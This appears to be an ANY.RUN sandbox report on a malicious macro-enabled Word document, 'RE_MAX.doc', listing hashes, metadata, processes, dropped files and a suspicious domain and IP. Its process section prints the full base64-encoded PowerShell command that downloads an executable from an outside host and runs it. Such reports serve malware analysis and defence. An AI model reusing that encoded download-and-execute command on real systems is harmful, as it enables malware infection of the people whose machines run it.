analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

RE_MAX.doc

Full analysis: https://app.any.run/tasks/2b79f4b5-cb21-41e0-8bdd-c2a5f940ff59
Verdict: Malicious activity
Analysis date: December 06, 2018, 15:04:30
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: Fundamental mobile alliance, Subject: Mississippi Gabriella, Author: 885.732.1522, Comments: Open-architected full-range challenge, Template: Normal, Last Saved By: Windows, Revision Number: 11, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Thu Apr 19 19:59:00 2018, Last Saved Time/Date: Thu Dec 6 08:30:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 2, Security: 0
MD5:

494180B66A7360FE706EEED9D83B6FC4

SHA1:

69715B30D57B0F06E8F8C7C4FF68FB1CC58B043A

SHA256:

073D151A790BA6C2F688924ABEBF22EA98BF1953AED65DE12488A391E30FA9ED

SSDEEP:

1536:RSWmjyhdu28k6WZ0MyDO74D+3Ihd4BQYYP:jm2hJ8kf0MpUhew

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2952)
    • Executes PowerShell scripts

      • cMd.EXE (PID: 3760)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2952)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2284)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2952)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2952)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
  • Название
  • 1
TitleOfParts:
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 2
Paragraphs: 1
Lines: 1
Bytes: 23552
Company: Labadie Group Brad Windler
Manager: Stanton Bergstrom
CodePage: Windows Cyrillic
Security: None
Characters: 2
Words: -
Pages: 1
ModifyDate: 2018:12:06 08:30:00
CreateDate: 2018:04:19 18:59:00
TotalEditTime: 3.0 minutes
Software: Microsoft Office Word
RevisionNumber: 11
LastModifiedBy: Пользователь Windows
Template: Normal
Comments: Open-architected full-range challenge
Keywords: -
Author: 885.732.1522
Subject: Mississippi Gabriella
Title: Fundamental mobile alliance
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2952"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\RE_MAX.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3760cMd.EXE /c poWerShelL.exe -ec KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwB1AHMAdABlAG8AdQByAGEAcABoAC4AYwBvAG0ALwBLAEgAWgAvAGQAaQB1AHkAegAuAHAAaABwAD8AbAA9AGwAeQBmAHgAMgAuAHQAawBuACIALAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXAAzAGEAYgBiAGYAMgA3ADIALgBlAHgAZQAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAJwBcADMAYQBiAGIAZgAyADcAMgAuAGUAeABlACcAOwAgAEUAeABpAHQAC:\Windows\system32\cMd.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2284poWerShelL.exe -ec KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwB1AHMAdABlAG8AdQByAGEAcABoAC4AYwBvAG0ALwBLAEgAWgAvAGQAaQB1AHkAegAuAHAAaABwAD8AbAA9AGwAeQBmAHgAMgAuAHQAawBuACIALAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXAAzAGEAYgBiAGYAMgA3ADIALgBlAHgAZQAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAJwBcADMAYQBiAGIAZgAyADcAMgAuAGUAeABlACcAOwAgAEUAeABpAHQAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cMd.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 367
Read events
971
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2952WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA76E.tmp.cvr
MD5:
SHA256:
2284powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6P84FSD23F9YRLCKZTGI.temp
MD5:
SHA256:
2284powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0C1DAA668BA499584B0AC7476368101E
SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
2952WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$RE_MAX.docpgc
MD5:449B1C566539E7C2D2A32E2DD4A21E5D
SHA256:726E0D517246D25D1025E663B32D2A92CDBC21712EF7E27B53B3E07C0951B028
2284powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13afcb.TMPbinary
MD5:0C1DAA668BA499584B0AC7476368101E
SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
2952WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:A66FA7B6C40259F53F2967B38084B660
SHA256:9584370CB64A093AB4759892A75A1755D4AF838969C7A7F926E0D8ED0695F1F2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2284
powershell.exe
185.135.82.131:80
usteouraph.com
Krek Ltd.
RU
suspicious

DNS requests

Domain
IP
Reputation
usteouraph.com
  • 185.135.82.131
suspicious

Threats

No threats detected
No debug info